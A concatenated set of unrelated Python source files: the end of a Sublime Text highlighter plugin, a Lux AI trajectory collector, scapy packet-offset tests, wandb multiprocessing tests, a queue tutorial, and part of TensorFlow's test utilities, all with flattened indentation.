__signaled_first_ = 0
__signaled_ = 0
# print('DISPATCHING!', len(QUEUE))
queue_dispatcher()
def queue(view, callback, kwargs):
global __signaled_, __signaled_first_
now = time.time()
__lock_.acquire()
try:
QUEUE[view.id()] = callback
delay = kwargs['delay']
if now < __signaled_ + delay * 4:
delay = kwargs['delay_when_busy']
__signaled_ = now
_delay_queue(delay, kwargs['preemptive'])
# print('%s queued in %s' % ('' if __signaled_first_ else 'first ', __signaled_ - now))
if not __signaled_first_:
__signaled_first_ = __signaled_
finally:
__lock_.release()
def _delay_queue(delay, preemptive):
global __signaled_, __queued_
now = time.time()
if not preemptive and now <= __queued_ + 0.01:
return # never delay queues too fast (except preemptively)
__queued_ = now
_delay = float(delay) / 1000
if __signaled_first_:
if MAX_DELAY > 0 and now - __signaled_first_ + _delay > MAX_DELAY:
_delay -= now - __signaled_first_
if _delay < 0:
_delay = 0
delay = int(round(_delay * 1000, 0))
new__signaled_ = now + _delay - 0.01
if __signaled_ >= now - 0.01 and (preemptive or new__signaled_ >= __signaled_ - 0.01):
__signaled_ = new__signaled_
# print('delayed to %s' % (preemptive, __signaled_ - now))
def _signal():
if time.time() < __signaled_:
return
__semaphore_.release()
sublime.set_timeout(_signal, delay)
def delay_queue(delay):
__lock_.acquire()
try:
_delay_queue(delay, False)
finally:
__lock_.release()
# only start the thread once - otherwise the plugin will get laggy
# when saving it often.
__semaphore_ = threading.Semaphore(0)
__lock_ = threading.Lock()
__queued_ = 0
__signaled_ = 0
__signaled_first_ = 0
# First finalize old standing threads:
__loop_ = False
__pre_initialized_ = False
def queue_finalize(timeout=None):
global __pre_initialized_
for thread in threading.enumerate():
if thread.isAlive() and thread.name == queue_thread_name:
__pre_initialized_ = True
thread.__semaphore_.release()
thread.join(timeout)
queue_finalize()
# Initialize background thread:
__loop_ = True
__active_custom_highlighter_thread = threading.Thread(target=queue_loop, name=queue_thread_name)
__active_custom_highlighter_thread.__semaphore_ = __semaphore_
__active_custom_highlighter_thread.start()
################################################################################
# Initialize settings and main objects only once
class CustomHighlighterSettings(Settings):
def on_update(self):
window = sublime.active_window()
view = window.active_view()
view.run_command('custom_highlighter', dict(action='reset'))
settings = CustomHighlighterSettings(NAME)
class CustomHighlighterSettingCommand(SettingTogglerCommandMixin, sublime_plugin.WindowCommand):
settings = settings
if 'colorizer' not in globals():
colorizer = SchemaColorizer()
################################################################################
def plugin_loaded():
settings.load()
|
collector.py
|
def collect(config_out, input_data_out, data_path_out, collector_n_out, global_var_actor_out=None,
steps=10):
import abc
import time
from multiprocessing import Process
import tensorflow as tf
import gym
# import reverb
# import ray
import lux_gym.agents.agents as agents
from lux_ai import tools, tfrecords_storage
from lux_gym.envs.lux.action_vectors_new import empty_worker_action_vectors
physical_devices = tf.config.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
# REWARD_CAP = 2000000
class Agent(abc.ABC):
def __init__(self, config, data):
# buffer_table_names, buffer_server_port,
# ray_queue=None, collector_id=None, workers_info=None, num_collectors=None
# ):
"""
Args:
config: A configuration dictionary
data: a neural net weights
# buffer_table_names: dm reverb server table names
# buffer_server_port: a port where a dm reverb server was initialized
# ray_queue: a ray interprocess queue to store neural net weights
# collector_id: to identify a current collector if there are several ones
# workers_info: a ray interprocess (remote) object to store shared information
# num_collectors: a total amount of collectors
"""
self._env_name = config["environment"]
self._n_points = config["n_points"]
self._model_name = config["model_name"]
if data is None:
print("Collecting from a random agent.")
self._agent = agents.get_processing_agent(self._model_name, data)
self._feature_maps_shape = tools.get_feature_maps_shape(config["environment"])
self._actions_shape = [item.shape for item in empty_worker_action_vectors]
# self._table_names = buffer_table_names
# self._client = reverb.Client(f'localhost:{buffer_server_port}')
# self._ray_queue = ray_queue
# self._collector_id = collector_id
# self._workers_info = workers_info
# self._num_collectors = num_collectors
self._only_wins = config["only_wins"]
self._is_for_rl = config["is_for_rl"]
self._is_pg_rl = config["is_pg_rl"]
def _collect(self, agent):
"""
Collects trajectories from an episode. Episodes consists of n_points.
One n_point contains (action, action_probs, action_mask, observation,
total reward, temporal_mask, progress);
action is a response for the current observation,
reward, done are for the current observation.
"""
player1_data = {}
player2_data = {}
environment = gym.make(self._env_name)
observations = environment.reset()
configuration = environment.configuration
game_states = environment.game_states
actions_1, actions_1_dict, actions_1_probs, proc_obs1, reward1 = agent(observations[0],
configuration, game_states[0])
actions_2, actions_2_dict, actions_2_probs, proc_obs2, reward2 = agent(observations[1],
configuration, game_states[1])
step = 0
player1_data = tools.add_point(player1_data, actions_1_dict, actions_1_probs, proc_obs1, step)
player2_data = tools.add_point(player2_data, actions_2_dict, actions_2_probs, proc_obs2, step)
# for step in range(1, configuration.episodeSteps):
while True:
step += 1
player1_prev_alive_units = [item.id for item in game_states[0].player.units]
player2_prev_alive_units = [item.id for item in game_states[1].player.units]
dones, observations = environment.step((actions_1, actions_2))
game_states = environment.game_states
if any(dones):
player1_alive_units_ids = []
player1_died_on_last_step_units_ids = []
player1_alive_units = [item.id for item in game_states[0].player.units]
for unit in player1_prev_alive_units:
if unit in player1_alive_units:
player1_alive_units_ids.append(unit)
else:
player1_died_on_last_step_units_ids.append(unit)
player2_alive_units_ids = []
player2_died_on_last_step_units_ids = []
player2_alive_units = [item.id for item in game_states[1].player.units]
for unit in player2_prev_alive_units:
if unit in player2_alive_units:
player2_alive_units_ids.append(unit)
else:
player2_died_on_last_step_units_ids.append(unit)
break
actions_1, actions_1_dict, actions_1_probs, proc_obs1, reward1 = agent(observations[0],
configuration, game_states[0])
actions_2, actions_2_dict, actions_2_probs, proc_obs2, reward2 = agent(observations[1],
configuration, game_states[1])
player1_data = tools.add_point(player1_data, actions_1_dict, actions_1_probs, proc_obs1, step)
player2_data = tools.add_point(player2_data, actions_2_dict, actions_2_probs, proc_obs2, step)
reward1 = observations[0]["reward"]
reward2 = observations[1]["reward"]
unit_rewards = {}
if reward1 != reward2:
if reward1 > reward2: # 1 player won
win_data = player1_data
win_died_on_last_step_units_ids = player1_died_on_last_step_units_ids
# win_alive_units_ids = player1_alive_units_ids
lose_data = player2_data
lose_died_on_last_step_units_ids = player2_died_on_last_step_units_ids
lose_alive_units_ids = player2_alive_units_ids
else:
win_data = player2_data
win_died_on_last_step_units_ids = player2_died_on_last_step_units_ids
# win_alive_units_ids = player2_alive_units_ids
lose_data = player1_data
lose_died_on_last_step_units_ids = player1_died_on_last_step_units_ids
lose_alive_units_ids = player1_alive_units_ids
for unit_id in win_data.keys():
if unit_id in win_died_on_last_step_units_ids:
unit_rewards[unit_id] = tf.constant(-0.33, dtype=tf.float16)
else:
unit_rewards[unit_id] = tf.constant(1, dtype=tf.float16)
for unit_id in lose_data.keys():
if unit_id in lose_died_on_last_step_units_ids:
unit_rewards[unit_id] = tf.constant(-1, dtype=tf.float16)
elif unit_id in lose_alive_units_ids:
unit_rewards[unit_id] = tf.constant(0.33, dtype=tf.float16)
else:
unit_rewards[unit_id] = tf.constant(0, dtype=tf.float16)
else:
players_data = {**player1_data, **player2_data}
for unit_id in players_data.keys():
if unit_id in player1_died_on_last_step_units_ids + player2_died_on_last_step_units_ids:
unit_rewards[unit_id] = tf.constant(-1, dtype=tf.float16)
else:
unit_rewards[unit_id] = tf.constant(0.33, dtype=tf.float16)
progress = tf.linspace(0., 1., step + 2)[:-1]
progress = tf.cast(progress, dtype=tf.float16)
# if reward1 > reward2:
# final_reward_1 = tf.constant(1, dtype=tf.float16)
# final_reward_2 = tf.constant(-1, dtype=tf.float16)
# elif reward1 < reward2:
# final_reward_2 = tf.constant(1, dtype=tf.float16)
# final_reward_1 = tf.constant(-1, dtype=tf.float16)
# else:
# final_reward_1 = final_reward_2 = tf.constant(0, dtype=tf.float16)
# final_reward_1 = reward1 / REWARD_CAP if reward1 != -1 else 0
# final_reward_1 = 2 * final_reward_1 - 1
# final_reward_2 = reward2 / REWARD_CAP if reward2 != -1 else 0
# final_reward_2 = 2 * final_reward_2 - 1
if self._only_wins:
if reward1 > reward2:
output = (player1_data, None), unit_rewards, progress
elif reward1 < reward2:
output = (None, player2_data), unit_rewards, progress
else:
output = (player1_data, player2_data), unit_rewards, progress
else:
output = (player1_data, player2_data), unit_rewards, progress
return output
def collect_once(self):
return self._collect(self._agent)
def collect_and_store(self, collect_n, data_path, collector_n):
(player1_data, player2_data), rewards, progress = self.collect_once()
tfrecords_storage.record(player1_data, player2_data, rewards,
self._feature_maps_shape, self._actions_shape, collect_n,
collect_n, progress,
is_for_rl=self._is_for_rl, save_path=data_path, collector_n=collector_n,
is_pg_rl=self._is_pg_rl)
def collect_and_store(iteration, conf, in_data, data_path, collector_n):
collect_agent = Agent(conf, in_data)
collect_agent.collect_and_store(iteration, data_path, collector_n)
# collect_and_store(0, config_out, input_data_out, data_path_out, collector_n_out)
for i in range(steps):
p = Process(target=collect_and_store, args=(i, config_out, input_data_out, data_path_out, collector_n_out))
p.start()
p.join()
# if global_var_actor_out is not None:
# ray.get(global_var_actor_out.set_done.remote(True))
print("Collecting is done.")
time.sleep(1)
|
scapy_isolated_test.py
|
#!/usr/bin/python
import sys, os
from multiprocessing import Process
import tempfile
from functools import wraps
def check_offsets(build, scapy_str):
import sys
# clean this env
for key in sys.modules.copy().keys():
if key.startswith('scapy.'):
del sys.modules[key]
globals().clear()
import outer_packages
from scapy.all import Ether, IP, UDP
pkt = eval(scapy_str)
if build:
pkt.build()
assert pkt
assert pkt.payload
lay = pkt
while lay:
print(' ### %s (offset %s)' % (lay.name, lay._offset))
lay.dump_fields_offsets()
if lay == pkt:
assert lay._offset == 0, 'Offset of first layer should be zero.'
else:
if build:
assert lay._offset != 0, 'Offset of second and further layers should not be zero if packets is built.'
else:
assert lay._offset == 0, 'Offset of second and further layers should be zero if packets is not built.'
for index, field in enumerate(lay.fields_desc):
if index == 0:
assert field._offset == 0, 'Offset of first field should be zero.'
else:
if build:
if field.get_size_bytes() == 0:
continue
assert field._offset != 0, 'Offset of second and further fields should not be zero if packets is built.'
else:
assert field._offset == 0, 'Offset of second and further fields should be zero if packets is not built.'
lay = lay.payload
def check_offsets_pcap(pcap):
import sys
# clean this env
for key in sys.modules.copy().keys():
if key.startswith('scapy.'):
del sys.modules[key]
globals().clear()
import outer_packages
from scapy.all import Ether, IP, UDP
from scapy.layers.dns import DNS
from scapy.utils import rdpcap
pkt = rdpcap(pcap)[0]
assert pkt
assert pkt.payload
not_built_offsets = {}
cond_var_length = False
lay = pkt
while lay:
print(' ### %s (offset %s)' % (lay.name, lay._offset))
not_built_offsets[lay.name] = {}
not_built_offsets[lay.name]['_offset'] = lay._offset
lay.dump_fields_offsets()
if lay == pkt:
assert lay._offset == 0, 'Offset of first layer should be zero.'
else:
assert lay._offset != 0, 'Offset of second and further layers should not be zero.'
for index, field in enumerate(lay.fields_desc):
if index == 0:
assert field._offset == 0, 'Offset of first field should be zero.'
if field.name == "length":
cond_var_length = True
else:
if field.get_size_bytes() == 0:
continue
if cond_var_length:
cond_var_length = False
continue
assert field._offset != 0, 'Offset of second and further fields should not be zero if packets is built.'
not_built_offsets[lay.name][field.name] = field._offset
lay = lay.payload
print('')
pkt.build()
cond_var_length = False
lay = pkt
while lay:
print(' ### %s (offset %s)' % (lay.name, lay._offset))
assert not_built_offsets[lay.name]['_offset'] == lay._offset, 'built and not built pcap offsets differ'
lay.dump_fields_offsets()
if lay == pkt:
assert lay._offset == 0, 'Offset of first layer should be zero.'
else:
assert lay._offset != 0, 'Offset of second and further layers should not be zero.'
for index, field in enumerate(lay.fields_desc):
if index == 0:
assert field._offset == 0, 'Offset of first field should be zero.'
if field.name == "length":
cond_var_length = True
else:
if field.get_size_bytes() == 0:
continue
if cond_var_length:
cond_var_length = False
continue
assert field._offset != 0, 'Offset of second and further fields should not be zero if packets is built.'
assert not_built_offsets[lay.name][field.name] == field._offset, 'built and not built pcap offsets differ'
lay = lay.payload
def isolate_env(f):
@wraps(f)
def wrapped(*a):
print('')
p = Process(target = f, args = a)
p.start()
p.join()
if p.exitcode:
raise Exception('Return status not zero, check the output')
return wrapped
class CScapy_Test():
def setUp(self):
self.dir = os.path.abspath(os.path.dirname(__file__)) + '/'
# verify that built packet gives non-zero offsets
@isolate_env
def test_scapy_offsets_udp_build(self):
check_offsets(scapy_str = "Ether()/IP()/UDP()/('x'*9)", build = True)
# verify that non-built packet gives zero offsets
@isolate_env
def test_scapy_offsets_udp_nobuild(self):
check_offsets(scapy_str = "Ether()/IP()/UDP()/('x'*9)", build = False)
# verify that pcap either built or not gives same non-zero offsets
@isolate_env
def test_scapy_offsets_pcap(self):
check_offsets_pcap(pcap = self.dir + 'golden/bp_sim_dns_vlans.pcap')
@isolate_env
def test_scapy_ipfix(self):
from scapy.contrib.ipfix import IPFIX
p = IPFIX()
p.show2()
@isolate_env
def test_scapy_utils(self):
from scapy.all import str2int, int2str, str2ip
# str2int
assert str2int('0') == ord('0')
assert str2int(b'\x07') == 7
assert str2int(b'\xff') == 255
assert str2int(b'\x01\xff') == 511
assert str2int(5) == 5
assert str2int('be') == 25189 # ord(b) * 2^8 + ord(e)
assert str2int('') == 0
# int2str
assert int2str(98) == b'b'
assert int2str(255) == b'\xff'
assert int2str(50000, 2) == b'\xc3\x50'
assert int2str(25189) == "be".encode('utf-8')
assert int2str(0) == ''.encode('utf-8')
assert int2str(5, 3) == b'\x00\x00\x05'
# str2ip
assert str2ip(b'\xff\xff\xff\xff') == '255.255.255.255'
assert str2ip(b'\xc0\xa8\x00\x01') == '192.168.0.1'
|
test_mp_full.py
|
from __future__ import print_function
"""
multiproc full tests.
"""
import importlib
import multiprocessing
import platform
import pytest
import time
import wandb
from wandb.errors import UsageError
import sys
def train(add_val):
time.sleep(1)
wandb.log(dict(mystep=1, val=2 + add_val))
wandb.log(dict(mystep=2, val=8 + add_val))
wandb.log(dict(mystep=3, val=3 + add_val))
wandb.log(dict(val2=4 + add_val))
wandb.log(dict(val2=1 + add_val))
time.sleep(1)
def test_multiproc_default(live_mock_server, test_settings, parse_ctx):
run = wandb.init(settings=test_settings)
train(0)
run.finish()
ctx_util = parse_ctx(live_mock_server.get_ctx())
summary = ctx_util.summary
s = {k: v for k, v in dict(summary).items() if not k.startswith("_")}
assert dict(val=3, val2=1, mystep=3) == s
@pytest.mark.skipif(platform.system() == "Windows", reason="fork needed")
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="flaky?")
def test_multiproc_ignore(live_mock_server, test_settings, parse_ctx):
run = wandb.init(settings=test_settings)
train(0)
procs = []
for i in range(2):
procs.append(multiprocessing.Process(target=train, kwargs=dict(add_val=100)))
try:
for p in procs:
p.start()
finally:
for p in procs:
p.join()
assert p.exitcode == 0
run.finish()
ctx_util = parse_ctx(live_mock_server.get_ctx())
summary = ctx_util.summary
s = {k: v for k, v in dict(summary).items() if not k.startswith("_")}
assert dict(val=3, val2=1, mystep=3) == s
@pytest.mark.flaky
@pytest.mark.skipif(platform.system() == "Windows", reason="fork needed")
@pytest.mark.xfail(platform.system() == "Darwin", reason="console parse_ctx issues")
def test_multiproc_strict(live_mock_server, test_settings, parse_ctx):
test_settings.strict = "true"
run = wandb.init(settings=test_settings)
train(0)
procs = []
for i in range(2):
procs.append(multiprocessing.Process(target=train, kwargs=dict(add_val=100)))
try:
for p in procs:
p.start()
finally:
for p in procs:
p.join()
# expect fail
assert p.exitcode != 0
run.finish()
ctx_util = parse_ctx(live_mock_server.get_ctx())
summary = ctx_util.summary
s = {k: v for k, v in dict(summary).items() if not k.startswith("_")}
assert dict(val=3, val2=1, mystep=3) == s
def test_multiproc_strict_bad(live_mock_server, test_settings, parse_ctx):
with pytest.raises(UsageError):
test_settings.strict = "bad"
@pytest.mark.skipif(
sys.version_info[0] < 3, reason="multiprocessing.get_context introduced in py3"
)
def test_multiproc_spawn(test_settings):
# WB5640. Before the WB5640 fix this code fragment would raise an
# exception, this test checks that it runs without error
from .utils import test_mod
test_mod.main()
sys.modules["__main__"].__spec__ = importlib.machinery.ModuleSpec(
name="tests.utils.test_mod", loader=importlib.machinery.BuiltinImporter
)
test_mod.main()
sys.modules["__main__"].__spec__ = None
# run this to get credit for the diff
test_mod.mp_func()
|
queue.py
|
# Using queue.Queue
# • The queue.Queue data structure can be used to synchronize both threads and processes
import threading
import queue
q = queue.Queue()
def worker():
while True:
item = q.get()
print(f"Item {item}.", end=" ")
q.task_done()
threading.Thread(target=worker, daemon=True).start()
for item in range(3):
q.put(item)
q.join()
print("All done!")
# Output: Item 0. Item 1. Item 2. All done!
# multi processes används för tunga beräkningar och
# multi threading används när man tex måste vänta på en web-sida
|
test_util.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import re
import sys
import threading
import numpy as np
import six
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
from tensorflow.python.platform import logging
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError(
"Expected op for node %s is different. %s vs %s" % (
node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError(
"Not all expected ops are present. Expected %s, found %s" % (
expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"):
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
ops.reset_default_graph()
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
if not self._tempdir:
self._tempdir = googletest.GetTempDir()
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form
message: the message to validate
"""
if type(expected_message_maybe_ascii) == type(message):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message)
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self, expected, actual, producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(graph=None,
config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail(
"Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (
f1, f2, err, " (%s)" % msg if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays have near values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
rtol: relative tolerance
atol: absolute tolerance
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.abs(a - b) > atol + rtol * np.abs(b)
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in OpError exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
errors.OpError exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message
op = e.op
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(e)
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
